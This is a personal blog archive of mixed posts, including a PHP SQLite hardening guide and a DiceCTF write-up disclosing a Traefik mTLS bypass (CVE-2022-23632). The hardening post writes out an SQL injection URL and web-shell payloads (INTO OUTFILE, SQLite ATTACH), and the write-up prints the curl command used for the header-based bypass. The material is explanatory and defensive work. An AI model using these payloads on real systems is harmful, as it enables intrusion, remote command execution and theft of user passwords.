Sunday, December 4, 2022

Hardening SQLite against injection in PHP

tl;dr: What are our options in php to make SQLite not write files when given malicious SQL queries as a hardening measure against SQL injection?

 

One of the most famous web application security vulnerabilities is the SQL injection.

This is where you have code like:

doQuery( "SELECT foo1, foo2 from bar where baz = '" . $_GET['fred'] . "';" );

The attacker goes to a url like ?fred='%20UNION%20ALL%20SELECT%20user%20'foo1',%20password%20'foo2'%20from%20users;--

The end result is: doQuery( "SELECT foo1, foo2 from bar where baz ='' UNION ALL SELECT user 'foo1', password 'foo2' from users ;-- ';" );

and the attacker has all your user's passwords. Portswigger has a really good detailed explanation on how such attacks work.

In addition to dumping all your private info, the usual next step is to try and get code execution. In a PHP environment, often this means getting your DB to write a a php file in the web directory.

In MariaDB/MySQL this looks like:

SELECT '<?php system($_GET["c"]);?>' INTO OUTFILE "/var/www/html/w/foo.php";

Of course, in a properly setup system, permissions are such that mysqld/mariadbd does not have permission to write in the web directory and the DB user does not have FILE privileges, so cannot use INTO OUTFILE.

In SQLite, the equivalent is to use the ATTACH command to create a new database (or VACUUM). Thus the SQLite equivalent is:

ATTACH DATABASE '/var/www/html/w/foo.php' AS foo; CREATE TABLE foo.bar (stuff text); INSERT INTO foo.bar VALUES( '<?php system($_GET["c"]);?>' );

This is harder than the MySQL case, since it involves multiple commands and you can't just add it as a suffix but have to inject as a prefix. It is very rare you would get this much control in an SQL injection.

Nonetheless it seems like the sort of thing we would want to disable in a web application, as a hardening best practice. After all, dynamically attaching multiple databases is rarely needed in this type of application.

Luckily, SQLite implements a feature called run time limits. There are a number of limits you can set. SQLite docs contain a list of suggestions for paranoid people at https://www.sqlite.org/security.html. In particular, there is a LIMIT_ATTACH which you can set to 0 to disable attaching databases. There is also a more fine grained authorizer API which allows setting a permission callback to check things on a per-statement level.

Unfortunately PHP PDO-SQLITE supports neither of these things. It does set an authorizer if you have open_basedir on to prevent reading/writing outside the basedir, but it exposes no way that I can see for you to set them yourself. This seems really unfortunate. Paranoid people would want to set runtime limits. People who have special use-cases may even want to raise them. I really wish PDO-SQLITE supported setting these, perhaps as a driver specific connection option in the constructor.

On the bright side, if instead of using the PDO-SQLITE php extension, you are using the alternative sqlite3 extension there is a solution. You still cannot set runtime limits but you can set a custom authorizer:

$db = new SQLite3($dbFileName);
$db->setAuthorizer(function ( $action, $filename ) {
        return $action === SQLite3::ATTACH ? Sqlite3::DENY : Sqlite3::OK;
});

After this if you try and do an ATTACH you get:

Warning: SQLite3::query(): Unable to prepare statement: 23, not authorized in /var/www/html/w/test.php on line 17

Thus success! No evil SQL can possibly write files.



Thursday, November 24, 2022

TV Show review: Stargate SGU


 If I could sum up this show in 2 words, I think it would be "wasted potential". There's a lot I really like about this show but the writers play it way too safe and it never really seems to come together into something truly interesting.

This was the third spin off in the Stargate Franchise, and if the original stargate TV show is Star Trek The Next Generation, and Atlantis is DS9, then this would be the franchise's Star Trek Voyager.

And it has a very similar set up to Star Trek Voyager: They get flung half way across the universe and cannot get back. They aren't really prepared for the mission. There are enemies who (eventually) get stranded with them who they don't trust but nonetheless integrate into the crew.

The other show that seems an obvious influence would be Battlestar Galactica (BSG). I'd even go as far to say that this show is essentially what would happen if Voyager and BSG had a baby that dressed up as Stargate for halloween. You can especially see the BSG influence in where the drama of the show is focused. Voyager was very much alien of the week. SGU focuses inwardly on its main cast and their struggles, in a more serialized fashion. The crew don't trust each other. There are cliques. They are stressed. They struggle with their emotions. The civilians and the military mistrust each other, just like in BSG. Additionally, BSG's Baltar was clearly an influence on how the lead scientist Dr Rush was depicted.

However, unlike BSG, this show doesn't really commit to being serialized, and as a result the characters never really grow. Any time something interesting happens to change the status quo, it gets reset in the next 2 or 3 episodes. For example, two of the character's dead girlfriend gets resurrected as a computer program in the ship - then 2 episodes later a contrived situation happens where they have to be "quarantined" in AI jail, never to be seen from or thought of again. Plots like this are common, where something happens that implies the characters will have to change and adapt, but just as you're excited to see how that plays out, the status quo ante is restored. Nothing ever seems permanent and you don't get the pay off for teased change. The worst example is probably Col. Telford, who switches from being obnoxious, to evil, to good, is marooned but comes back, is killed but then cloned in an alternate time line, etc. The character gets swapped around so much it is simply ridiculous.

In many ways, one of the best plot lines in the show, involves having an alternate timeline of the crew be sent back a thousand years, and the main timeline crew meeting their descendants and being shown archival footage of their alternate selves from a thousand years ago. This allowed the writers to show what might have been for these characters, and it was the most compelling character development in the show. I suppose the writers felt safer making bold choices with these alternate versions of the character, since the real characters didn't necessarily need to abide by them. However I can't help but think what a great show this would have been if this type of character development took place throughout.

Ultimately, this show felt like it didn't quite know what it wanted to be. It used patterns from both serialized and episodic TV shows, resulting in something that was a bit in-between which satisfied neither. It teased complex characters, but mostly failed to commit to actually developing them, instead playing things safe. Most frustrating of all, at times it did do interesting things, and you could see the potential. By the end, I really did like this characters, and wished I knew more about them. Thus why I think "wasted potential" is the best descriptor for this show.





Sunday, September 11, 2022

Why don't we ever talk about volunteer PMs in open source?

 Recently, on Wikipedia, there was an open letter to the Wikimedia Foundation, asking them to improve the New Page Patrol feature.

This started the usual debate between, WMF should do something vs It is open source, {{sofixit}} (i.e. Send a patch). There's valid points on both sides of that debate, which I don't really want to get into.

However, it occurred to me - the people on the {{sofixit}} side always suggest that people should learn how to program (an unreasonable ask), figure out how to fix something, and do it themselves. On the other hand, in a corporate environment, stuff is never done solely by developers. You usually have either a product manager or a program manager organizing the work.

Instead of saying to users - learn PHP and submit a patch, why don't we say: Be the PM for the things you want done, so a programmer can easily just do them without getting bogged down with organizational questions?

At first glance this may sound crazy - after all, ordinary users have no authority. Being a PM is hard enough when people are paid to listen to you, how could it possibly work if nobody has to listen to you. And I agree - not everything a PM does is applicable here, but i think some things are.

Some things a volunteer person could potentially do:

  • Make sure that bugs are clearly described with requirements, so a developer could just do them instead of trying to figure out what the users need
  • Make sure tasks are broken down into appropriate sized tickets
  • Make a plan of what they wish would happen. A volunteer can't force people to follow their plan, but if you have a plan people may just follow it. Too often all that is present is a big list of bugs of varying priority which is hard for a developer to figure out what is important and what isn't
    • For example, what i mean is breaking things into a few milestones, and having each milestone contain a small number (3-5) tickets around a similar theme. This could then be used in order to promote the project to volunteer developers, using language like "Help us achieve milestone 2" and track progress. Perhaps even gamifying things.
    • No plan survives contact with the enemy of course, and the point isn't to stick to any plan religiously. The point is to have a short list of what the most pressing things to work on right now are. Half the battle is figuring out what to work on and what to work on first.
  • Coordinate with other groups as needed. Sometimes work might depend on other work other people have planned to do. Or perhaps the current work is dependent on someone else's requirements (e.g. new extensions require security review). Potentially a volunteer PM could help coordinate this or help ensure that everyone is on the same page about expectations and requirements.
  • [not sure about this one] Help find constructive code reviewers. In MediaWiki development, code much be reviewed by another developer to be merged in. Finding knowledgeable people can often be difficult and a lot of effort. Sometimes this comes down to personal relationships and politely nagging people until someone bites. For many developers this is a frustrating part of the software development process. Its not clear how productive a non-developer would be here, as you may need to understand the code to know who to talk to. Nonetheless, potentially this is something a non-programmer volunteer can help with.

To use the new page patrol feature as an example - Users have a list of 56 feature requests. There's not really any indication of which ones are more important then others. A useful starting point would be to select the 3 most important. There are plenty of volunteer developers in the MediaWiki ecosystem that might work on them. The less time they have to spend figuring out what is wanted, the more likely they might fix one of the things. There are no guarantees of course, but it is a thing that someone who is not a programmer could do to move things forward.

 To be clear, being a good PM is a skill - all of this is hard and takes practice to be good at. People who have not done it before won't be good at it to begin with. But I think it is something we should talk about more, instead of the usual refrain of fix it yourself or be happy with what you got.


p.s. None of this should be taken as saying that WMF shouldn't fix anything and it should only be up to the communities, simply that there are things non-programmers could do to {{sofixit}} if they were so inclined.

 

Sunday, August 21, 2022

Weekly roundup - aug 21

 Some things i read or saw this week that i thought were interesting.

Natural perspective


I found this blog post fascinating. Basically it talks about how human preception is different than what a photograph would be. For example if there is a big object of interest in the distance it usually looks larger. I never thought much about this before,  but now that it has been pointed out to me, it rings very true. 

Kill the hero save the (narrative) world


This was a talk fron the GDC conference, by Hannah Nicklin, who is the narrative lead of a video game called Mutazione, talking about the narrative structure of video games. Essentially the speaker was arguing that many video games follow a hero's journey type of plot where the story follows a protagonist's journey to becoming a hero. They feel that this is a structure that works really well in movies: the director can direct your focus to character traits and growth. The 2 hour length is also very suitable to developing a single character's journey. They argue that video games would be better suited to follow the structure of an emsamble cast tv show. They think that this allows a better balance between players being able to do whatever they want but still getting the plot across as the focus is less on the affect of actions on the main character's phsyche and more driven by characters interacting with a community of other characters.

I know very little of video games, so i don't know how true the premise rings. However i found the reasoning quite interesting, and it gave me a lot to think about.

Galatea, Versu, Character Engine

This was a talk from 2018 by Emily Short about making non playable characters in video games feel like real people with inner lives. She also talks a bit about the pros and cons of interactive fiction, which i have always find interesting.





Saturday, August 13, 2022

Book review: Reamde

 

 

It has been a while since I have read a Stephenson novel, so when I saw this 1044 pages of light reading on the library shelf, I thought I would give it a go.

While I still enjoyed this novel, overall it was one of my least favourite Stephenson novels that I have read. I think perhaps the type of novel this was - essentially a thriller set in basically our current world - showcased Stephenson's weaknesses and hid his strengths, as a writer.

Stephenson is pretty famous for writing giant novels, and this is no exception. However usually it feels like a lot more is going on to justify the length. In this novel, the plot seems much more straight forward, and instead of using the pages to explain complex concepts or explore the world, we instead get 150 page long car/boat chases.

I think fundamentally the reason why Neal Stephenson novels are usually really fun, is their setting. He essentially writes novels set in various nerd utopias. The difference between him and most other science fiction writers writing in utopia settings, is most of those types of novels spend a lot of time arguing for the utopia or telling you how good it is. In Neal Stephenson novels, there is less of that, and the novel is more just set there. We might see how much a character likes the setting through their eyes, and how excited they are by it, but it still seems less directly aimed at the reader. I think this eases suspension of disbelief, because it feels less preachy and allows one to get absorbed in the "coolness" of the fantasy without thinking about all the ways it falls apart. For example, both Ananthem and The Big U are romanticized versions of university life (albeit romanticized in opposite directions), Cryptonomicon is a romanticized version of the cypherpunk movement, Snow crash is kind of romanticized cyberpunk. [I read these a long time ago, I might not be remembering them that well]

In this novel, the only romanticized aspect, is a world where everyone thinks MMORPGs are really cool. Unfortunately, a world where slightly more people play MMORPGs, is a lame utopia.

Additionally it has very little to do with the plot. It does provide the inciting incident, where a ransomware computer virus infecting the MMORPG encrypts some mobsters' private files. However this felt arbitrary - the MMORPG aspect really didn't matter.

Even worse, we spend hundreds of pages on this MMORPG world and the ongoing re-alignment of the in-world factions (The so-called "War of realignment"). Just as it seems to be building to something, we cut away to the main plot, never bothering to resolve or revisit what was building. This is especially sad, because in a lot of ways, it was more interesting than the main plot. Instead it is relegated to being a rather trite metaphor for a theme in the main plot about people coming together to form a chosen tribe over whatever situations they were born into.

Perhaps that's the biggest disappointment in this book: The threads don't really come together to form something bigger. There are a bunch of interesting premises at various points that don't really seem to contribute much to the overall whole. There is the design of the MMORPG/War-of-realignment, which is talked about a lot, but doesn't really go anywhere. There are the motorcycle gangsters with katanas, which are introduced as a back-story for a side character, who just ends up being shot with no katana fights. There are the main character's relatives who are some sort of fundamentalist christian gun-nut cult, but when the action comes down they mostly just hide in their house like normal people.

Why bother with all these tantalizing details when everyone in the end just acts like a normal person. Their uniqueness seems unnecessary to the novel, which feels like a major let down.

Last of all and pretty unrelatedly, the female characters felt like they were written weirdly, in a hard to define way. The main character, Zula, spent most of the novel kidnapped, and there was a bizarre amount of discussion on the differing levels of chivalry her various kidnappers showed her. As if holding the door open for her somehow makes up for the whole kidnapping at gunpoint. Several characters debate whether Yuxia is a "sister" or girlfriend material, where "friend" or "person they just met last week under very traumatic circumstances" apparently didn't cross anyone's mind. All the romantic pairings seemed kind of random and forced (Except maybe Olivia & Sokolov). Yuxia had barely even exchanged any words with Seamus before suddenly being together. Csongor and Zula also had pretty limited interaction before falling in love.

In the end, i did enjoy it, but definitely not his strongest novel.

Wednesday, July 20, 2022

Interviewed on Between the brackets

 This week I was interviewed by Yaron Karon for the second time for his MediaWiki podcast Between the Brackets.

Yaron has been doing this podcast for several years now, and I love how he highlights the different voices of all the different groups that use, interact and develop MediaWiki. He's had some fascinating people on his podcast over the years, and I highly reccomend giving it a listen.

Anyhow, it's an honour to be on the program again for episode 117. I was previously on the program 4 years ago for episode 5


Monday, July 18, 2022

Write up DiceCTF 2022: Flare and stumbling upon a Traefik 0-day (CVE-2022-23632)

 A while back, I participated in DiceCTF. During the contest I was the first person to solve the problem "Flare":

This was pretty exciting. Normally I'm happy just to be able to solve a problem — I'm never first. Even better though, my solution wasn't the intended solution, and I had instead found a 0-day in the load balancing software the contest was using!

The contest was a while ago so this post is severely belated. Nonetheless, given how exciting this all was, I wanted to write it up.

The Problem

The contest problem was short and sweet. You had a flask app behind Cloudflare. If you accessed it with an internal IP address (e.g. 192.168.0.2 or 10.0.0.2), you get the flag. The entire code is just 18 lines, mostly boilerplate:

import os
import ipaddress

from flask import Flask, request
from gevent.pywsgi import WSGIServer

app = Flask(__name__)
flag = os.getenv('FLAG', default='dice{flag}')

@app.route('/')
def index():
    ip = ipaddress.ip_address(request.headers.get('CF-Connecting-IP'))

    if isinstance(ip, ipaddress.IPv4Address) and ip.is_private:
        return flag

    return f'No flag for {format(ip)}'

WSGIServer(('', 8080), app).serve_forever()
  

Avenues of Attack

Simple to understand, but how to attack? The direct approach seems unlikely; The service is behind Cloudflare — if we can trick Cloudflare into thinking we are connecting to a site from an arbitrary IP address, then that would be a very significant vulnerability. If we could actually make a TCP connection to Cloudflare from a IP address that should not be globally routable, then something is seriously wrong with the internet.

Thinking about it, it seems like the following approaches are possible:

  • Hack Cloudflare to send the wrong CF-Connection-IP header (Seems impossible)
  • Use some sort of HTTP smuggling or header normalization issue to send something that flask thinks is a valid CF-Connection-IP header, but Cloudflare doesn't recognize, and hope that when faced with 2 conflicting headers, flask chooses ours instead of Cloudflare's. (Also seems impossible)
  • Find the backend server and connect to it directly, bypassing Cloudflare allowing us to send whatever header we want


 With that in mind, I figured it had to be the third one. After all, this is a challenge, so it must have a solution, hence I figured it's probably neither impossible nor involving a high value vulnerability in a major CDN.

I was wrong of course. The intended solution was sort of a combination of the first possibility which i dismissed as impossible and python having an "interesting" definition of an "internal" IP, which there is no way I ever would have gotten. More on that later.

Trying to Find the Backend

So now that I determined my course of action, I started hunting for the backend server. I tried googling around for snippets from the page to see if any other sites came up in google with the same text. I tried looking at various "dns history" sites that were largely useless. I tried certificate transparency logs, but no. I even tried blindly typing in variations on the challenge's domain name.

The setup for the challenges were as follows: This challenge was on https://flare.mc.ax. The other challenges were all on *.mc.ax. This was the only challenge served by Cloudflare, the rest were served directly by the CTF infrastructure using a single IP address and a wildcard certificate.

With that in mind, I thought, maybe I could connect to the IP serving the other challenges, give the flare.mc.ax SNI and host header, and perhaps I will be directly connected to the backend. So I tried that, as well as the domain fronting version where you give the wrong SNI but the right host header. This did not work. However, to my surprise instead of getting a 404 response, I got a 421 Misdirected Redirect.

421 essentially means you asked for something that this server is not configured to give you, so you should re-check your DNS resolution to make sure you have the right IP address and try again. In HTTP/2, you are allowed to reuse a connection for other domains as long as it served a TLS certificate that would work for the other domain (This is called "Connection coalescing"). However, sometimes that back-fires especially with wildcard certs. Just because a server serves a TLS certificate for *.example.com, doesn't mean it knows how to literally handle everything under example.com since some subdomains might be served by a different server on a different IP. The new error code was created for such cases, to tell the browser it should stop with the connection coalescing, look up the DNS records for the domain name again, and open a separate connection. We needed a new code, because if the server just responded with a 404, the browser wouldn't know if its because the page just doesn't exist, or if its because the connection was inappropriately coalesced.

Looking back, I'm not sure I should have seen this as a sign. After all I was asking for a domain name that this server did not serve but had a correct certificate for, so this was the appropriate HTTP status code to give. However, the uniqueness of the error code and sudden change in behaviour around the domain name I was interested in, made me feel like I was on to something.

So I tried messing around with variations in headers and SNI. I tried silly things like having Host: flare.ac.mx/foo in the hopes that it would maybe confuse one layer, but another layer would strip it off, and get me the site i wanted or something like that.

Why settle for partial qualification? 

Eventually I tried Host: flare.ac.mx. (note the extra dot at the end) with no SNI.

curl 'https://104.196.60.107'  -vk --header 'host: flare.mc.ax.' --http1.1 --header 'CF-Connecting-IP: 127.0.0.1' --header 'X-Forwarded-For: 127.0.0.1' --header 'CF-ray: REDACTED' --header 'CF-IPCountry: CA' --header 'CF-Visitor: {"scheme":"https"}' --header 'CDN-Loop: cloudflare'

It worked.

Wait what?

What does a dot at the end of a domain name even mean?

In DNS, there is the concept of a partially qualified domain name (PQDN), and its opposite, the fully qualified domain name (FQDN). A partially qualified domain name is similar to a relative path - you can setup a default DNS search path in your DNS config (usually set by DHCP) that acts as a default suffix for partially qualified domain names. For example, if your default search path is example.com and you look up the host foo DNS will check foo.example.com.

I imagine this made more sense during the early internet, when it was more a "network of networks", and it was more common that you wanted to look up local resources on your local network.

In DNS, there is the root zone, which is represented by the empty string. This is the top of the DNS tree, which has TLDs like com or net, as its children.

If you add a period to the end of your DNS name, for example foo., this tells the DNS software that it isn't a partially qualified DNS name, but what you actually want, is to look up the foo domain in the root zone. So it does not lookup foo.example.com., but instead just foo..

For the most part, this is an obscure bit of DNS trivia. However, as far as web browsers are concerned, the PQDN example.net and FQDN example.net. are entirely separate domains. The same origin policy treats them differently, cookies set to one do not affect the other (TLS certificates seem to work for both though). In the past, people have used this trick to avoid advertisers on some websites.

So why did this work

So at this point, I solved the puzzle, obtained the flag and submitted it. Yay me!
 
But I still wasn't really sure what happened. I assumed there was some sort of misconfiguration involved, but I wasn't sure what. I did not have the configuration of the load-balancer. For that matter, I wasn't even sure yet which load balancing software was in use.

After I solved the problem, the competition organizers reached out and asked me what method I use. I imagine they wanted to see if I found the intended solution or stumbled upon something else. When I told them, they were very surprised. Apparently mutual TLS had been set up with cloudflare, and it should have been impossible to contact the backend if you did not have the correct client certificate, which I did not.

Wait what!?

The load balancing software in question was Traefik. In it, you can configure various requirements for different hosts. For example, you can say that a certain host needs a specific version of TLS, specific ciphers, specific server certificate or even a specific client certificate (mTLS). There is also a section for default options. In this case, they had one set of TLS settings for most of the domains, and a rule for the flare domain that you needed the correct client certificate to get access.

In normal operation, the SNI is checked and the appropriate requirements are applied. In the event that the SNI doesn't match the host header, and the host header matches a domain with different TLS requirements then the default requirements, a 421 status code is sent. This is all good.

However, if the host header has a period at the end to make it a FQDN, the code checking the TLS requirements doesn't think it matches the non-period version, so only the default requirements apply. However the rest of the code will still forward the request to the correct domain and process it as normal.

Thus, you can bypass any domain specific security requirements by not sending the SNI and adding an extra period to the host header.

This would be one thing for settings like min TLS version. However, it is an entirely different thing for access control settings such as mutual TLS as it allows an attacker to fully bypass the required client certificate, getting access to things they shouldn't be able to.

I reported this to the Traefik maintainers, and they fixed the issue in version 2.6.1. It was assigned CVE-2022-23632 and you can read more about it in their advisory. This was pretty exciting as well, as Traefik is used by quite a few people, and based on their github security advisory page, this is the first high-severity vulnerability that has been found in it.

What was the intended solution?

I found out later from the organizers of the CTF, that the intended solution was something very different. I definitely would never have came up with this myself.

The intended solution was to exploit two weird behaviours:

  • The python ipaddress library considers class E IP addresses (i.e. 240.0.0.0/4) to be "private". Class E addresses are reserved for future use. They are not globally routable, but they aren't private either, so it is odd that python considers them private. Python's own docs say that is_private is "True if the address is allocated for private networks" linking to IANA's official list, even though 240.0.0.0/4 is not listed as private use on that list.
  • Cloudflare has a feature where if your site does not support IPv6, you can enable "Pseudo IPv4", where the ipv6 connections will be forwarded as if they come from a class E IPv4 address. Cloudflare talks more about it in their blog post.

Which is a pretty fascinating combination.

Initially I discarded the possibility you could make Cloudflare give the wrong IP address, because I thought that would be such a major hack, that it wouldn't show up in this type of contest; people would either be reporting it or exploiting it, depending on the colour of their hat. However, my assumption was based on the idea that any sort of exploit would let you pick your IP. Being able to present as a random class E (which class E IP is based on an md5 hash of the top 64 bits of your IPv6 address, so you cannot choose it), is no where near as useful as being able to chose your IP (Everyone is just so trusting of 127.0.0.1). While this is a fascinating challenge, its hard to imagine a non-contrived situation where this would be a useful primitive. Making network access control in the real world that just blacklists all globally routable IPs instead of your own network seems silly. Even sillier would be to whitelist class E for some reason. Sure I guess an attacker could masquerade as one of these class E addresses to confuse anti-abuse systems, but if the site properly processes those connections, then it seems anti-abuse systems are likely to handle them just as easily as a normal IP. Since its still tied to your real IP, you can't hop between them unless you can hop between real IPs. If it ever really became an issue, Cloudflare lets you disable them, and there is also an additional header with the original IPv6 address you can use. At worst, maybe it makes reading logs after an incident more complicated, but this would be a really bad way to hide yourself in a world where VPNs are cheap and tor is free. In conclusion - its a fascinating behaviour, but practically speaking doesn't seem exploitable in the way that "make Cloudflare report your ip is something other than your ip" sounds like it would be exploitable at first glance.

 

 

Tuesday, July 12, 2022

Making Instant Commons Quick

 The Wikimedia family of websites includes one known as Wikimedia Commons. Its mission is to collect and organize freely licensed media so that other people can re-use them. More pragmatically, it collects all the files needed by different language Wikipedias (and other Wikimedia projects) into one place.

 

The 2020 Wikimedia Commons Picture of the Year: Common Kingfisher by Luca Casale / CC BY SA 4.0

 As you can imagine, it's extremely useful to have a library of freely licensed photos that you can just use to illustrate your articles.

However, it is not just useful for people writing encyclopedias. It is also useful for any sort of project.

To take advantage of this, MediaWiki, the software that powers Wikipedia and friends, comes with a feature to use this collection on your own Wiki. It's an option you can select when installing the software and is quite popular. Alternatively, it can be manually configured via $wgUseInstantCommons or the more advanced $wgForeignFileRepos.

The Issue

Unfortunately, instant commons has a reputation for being rather slow. As a weekend project I thought I'd measure how slow, and see if I could make it faster.

How Slow?

First things first, I'll need a test page. Preferably something with a large (but not extreme) number of images but not much else. A Wikipedia list article sounded ideal. I ended up using the English Wikipedia article: List of Governors General of Canada (Long live the Queen!). This has 85 images and not much else, which seemed perfect for my purposes.

I took the expanded Wikitext from https://en.wikipedia.org/w/index.php?title=List_of_governors_general_of_Canada&oldid=1054426240&action=raw&templates=expand, pasted it into my test wiki with instant commons turned on in the default config.

And then I waited...

Then I waited some more...

1038.18761 seconds later (17 minutes, 18 seconds) I was able to view a beautiful list of all my viceroys.

Clearly that's pretty bad. 85 images is not a small number, but it is definitely not a huge number either. Imagine how long [[Comparison_of_European_road_signs]] would take with its 3643 images or [[List_of_paintings_by_Claude_Monet]] with 1676.

Why Slow?

This raises the obvious question of why is it so slow. What is it doing for all that time?

When MediaWiki turns wikitext into html, it reads through the text. When it hits an image, it stops reading through the wikitext and looks for that image. Potentially the image is cached, in which case it can go back to rendering the page right away. Otherwise, it has to actually find it. First it will check the local DB to see if the image is there. If not it will look at Foreign image repositories, such as Commons (if configured).

To see if commons has the file we need to start making some HTTPS requests¹:

  1. We make a metadata request to see if the file is there and get some information about it: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=timestamp%7Cuser%7Ccomment%7Curl%7Csize%7Csha1%7Cmetadata%7Cmime%7Cmediatype%7Cextmetadata&prop=imageinfo&iimetadataversion=2&iiextmetadatamultilang=1&format=json&action=query&redirects=true&uselang=en
  2.  We make an API request to find the url for the thumbnail of the size we need for the article. For commons, this is just to find the url, but on wikis with 404 thumbnail handling disabled, this is also needed to tell the wiki to generate the file we will need: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=300&iiurlheight=-1&iiurlparam=300px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en
  3.  Some devices now have very high resolution screens. Screen displays are made up of dots. High resolution screens have more dots per inch, and thus can display more fine detailed. Traditionally 1 pixel equalled one dot on the screen. However if you keep that while increasing the dots-per-inch, suddenly everything on the screen that was measured in pixels is very small and hard to see. Thus these devices now sometimes have 1.5 dots per pixel, so they can display fine detail without shrinking everything. To take advantage of this, we use an image 1.5 times bigger than we normally would, so that when it is displayed in its normal size, we can take advantage of the extra dots and display a much more clear picture. Hence we need the same image but 1.5x bigger: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=450&iiurlheight=-1&iiurlparam=450px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en
  4. Similarly, some devices are even higher resolution and use 2 dots per pixel, so we also fetch an image double the normal size:  https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=600&iiurlheight=-1&iiurlparam=600px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en

 

This is the first problem - for every image we include we have to make 4 api requests. If we have 85 images that's 340 requests.

Latency and RTT

It gets worse. All of these requests are done in serial. Before doing request 2, we wait until we have the answer to request 1. Before doing request 3 we wait until we get the answer to request 2, and so on.

Internet speed can be measured in two ways - latency and bandwidth. Bandwidth is the usual measurement we're familiar with: how much data can be transferred in bulk - e.g. 10 Mbps.

Latency, ping time or round-trip-time (RTT) is another important measure - it's how long it takes your message to get somewhere and come back.

When we start to send many small messages in serial, latency starts to matter. How big your latency is depends on how close you are to the server you're talking to. For Wikimedia Commons, the data-centers (DCs) are located in San Francisco (ulsfo), Virginia (eqiad), Texas (codfw), Singapore (eqsin) and Amsterdam (esams). For example, I'm relatively close to SF, so my ping time to the SF servers is about 50ms. For someone with a 50ms ping time, all this back and forth will take at a minimum 17 seconds just from latency.

However, it gets worse; Your computer doesn't just ask for the page and get a response back, it has to setup the connection first (TCP & TLS handshake). This takes additional round-trips.

Additionally, not all data centers are equal. The Virginia data-center (eqiad)² is the main data center which can handle everything, the other DCs only have varnish servers and can only handle cached requests. This makes browsing Wikipedia when logged out very speedy, but the type of API requests we are making here cannot be handled by these caching DCs³. For requests they can't handle, they have to ask the main DC what the answer is, which adds further latency. When I tried to measure mine, i got 255ms, but I didn't measure very rigorously, so I'm not fully confident in that number. In our particular case, the TLS & TCP handshake are handled by the closer DC, but the actual api response has to be fetched all the way from the DC in Virginia.

But wait, you might say: Surely you only need to do the TLS & TCP setup once if communicating to the same host. And the answer would normally be yes, which brings us to major problem #2: Each connection is setup and tore down independently, requiring us to re-establish the TCP/TLS session each time. This adds 2 additional RTT. In our 85 image example, we're now up to 1020 round-trips. If you assume 50ms to caching DC and 255ms to Virginia (These numbers are probably quite idealized, there are probably other things I'm not counting), we're up to 2 minutes.

To put it altogether, here is a diagram representing all the back and forth communication needed just to use a single image:

12 RTT per image used! This is assuming TLS 1.3. Earlier versions of TLS would be even worse.

Introducing HTTP/2

In 2015, HTTP/2 came on the scene. This was the first major revision to the HTTP protocol in almost 20 years.

The primary purpose of this revision of HTTP, was to minimize the effect of latency when you are requesting many separate small resources around the same time. It works by allowing a single connection to be reused for many requests at the same time and allowing the responses to come in out of order or jumbled together. In HTTP/1.1 you can sometimes be stuck waiting for some request to finish before being allowed to start on the next one (Head of line blocking) resulting in inefficient use of network resources

This is exactly the problem that instant commons was having.

Now I should be clear, instant commons wasn't using HTTP/1.1 in a very efficient way, and it would be possible to do much better even with HTTP/1.1. However, HTTP/2 will still be that much better than what an improved usage of HTTP/1.1 would be.

Changing instant commons to use HTTP/2 changed two things:

  1. Instead of creating a new connection each time, with multiple round trips to set up TCP and TLS, we just use a single HTTP/2 connection that only has to do the setup once.
  2. If we have multiple requests ready to go, send them all off at once instead of having to wait for each one to finish before sending the next one.

We still can't do all requests at once, since the MediaWiki parser is serial, and it stops parsing once we hit an image, so we need to get information about the current image before we will know what the next one we need is. However, this still helps as for each image, we send 4 requests (metadata, thumbnail, 1.5dpp thumbnail and 2dpp thumbnail), which we can now send in parallel.


The results are impressive for such a simple change. Where previously my test page took 17 minutes, now it only takes 2 (139 seconds).


Transform via 404

In vanilla MediaWiki, you have to request a specific thumbnail size before fetching it; otherwise it might not exist. This is not true on Wikimedia Commons. If you fetch a thumbnail that doesn't exist, Wikimedia Commons will automatically create it on the spot. MediaWiki calls this feature "TransformVia404".

In instant commons, we make requests to create thumbnails at the appropriate sizes. This is all pointless on a wiki where they will automatically be created on the first attempt to fetch them. We can just output <img> tags, and the first user to look at the page will trigger the thumbnail creation. Thus skipping 3 of the requests.

Adding this optimization took the time down from 139 seconds with just HTTP/2 to 18.5 seconds with both this and HTTP/2. This is 56 times faster than what we started with!



Prefetching

18.5 seconds is pretty good. But can we do better?

We might not be able to if we actually have to fetch all the images, but there is a pattern we can exploit.

Generally when people edit an article, they might change a sentence or two, but often don't alter the images. Other times, MediaWiki might re-parse a page, even if there are no changes to it (e.g. Due to a cache expiry). As a result, often the set of images we need is the same or close to the set that we needed for the previous version of the page. This set is already recorded in the database in order to display what pages use an image on the image description page

We can use this. First we retrieve this list of images used on the (previous version) of the page. We can then fetch all of these at once, instead of having to wait for the parser to tell us one at a time which image we need.

It is possible of course, that this list could be totally wrong. Someone could have replaced all the images on the page. If it's right, we speed up by pre-fetching everything we need, all in parallel. If it's wrong, we fetched some things we didn't need, possibly making things slower than if we did nothing.

I believe in the average case, this will be a significant improvement. Even in the case that the list is wrong, we can send off the fetch in the background while MediaWiki does other page processing - the hope being, that MediaWiki does other stuff while this fetch is running, so if it is fetching the wrong things, time is not wasted.

On my test page, using this brings the time to render (Where the previous version had all the same images) down to 1.06 seconds. A 980 times speed improvement! It should be noted, that this is time to render in total, not just time to fetch images, so most of that time is probably related to rendering other stuff and not instant commons.

Caching

All the above is assuming a local cache miss. It is wasteful to request information remotely, if we just recently fetched it. It makes more sense to reuse information recently fetched.

In many cases, the parser cache, which in MediaWiki caches the entire rendered page, will mean that instant commons isn't called that often. However, some extensions that create dynamic content make the parser cache very short lived, which makes caching in instant commons more important. It is also common for people to use the same images on many pages (e.g. A warning icon in a template). In such a case, caching at the image fetching layer is very important.

There is a downside though, we have no way to tell if upstream has modified the image. This is not that big a deal for most things. Exif data being slightly out of date does not matter that much. However, if the aspect ratio of the image changes, then the image will appear squished until InstantCommons' cache is cleared.

